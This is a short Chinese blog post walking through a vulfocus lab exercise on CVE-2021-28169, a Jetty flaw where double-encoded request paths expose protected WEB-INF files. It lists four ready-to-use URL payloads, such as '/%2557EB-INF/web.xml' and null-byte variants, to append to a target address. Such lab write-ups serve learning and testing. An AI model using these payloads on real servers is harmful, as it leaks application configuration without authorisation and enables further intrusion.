vulfocus 靶场 jetty 敏感信息泄露（CVE-2021-28169）

西蒙娜2024-04-23 21:30

对于 <= 9.4.40、<= 10.0.2、<= 11.0.2 的 Eclipse Jetty 版本，对带有双重编码路径的 ConcatServlet 的请求可以访问 WEB-INF 目录中的受保护资源。例如，对 `/concat?/%2557EB-INF/web.xml` 的请求可以检索 web.xml 文件。这可能会泄露有关 Web 应用程序实施的敏感信息。

payload:

http://ip:port后面加如下payload：

static?/%2557Eb-INF/web.xml

/.%00/WEB-INF/web.xml

/%u002e/WEB-INF/web.xml

/a/b/..%00/WEB-INF/web.xml

直接访问：

对W进行编码为 %2557，访问：static?/%2557EB-INF/web.xml

上一篇：深度学习图像生成在AI去衣技术中的应用与探索

下一篇：十大排序——11.十大排序的比较汇总及Java中自带的排序算法

vulfocus 靶场 jetty 敏感信息泄露 （CVE-2021-28169）

vulfocus 靶场 jetty 敏感信息泄露（CVE-2021-28169）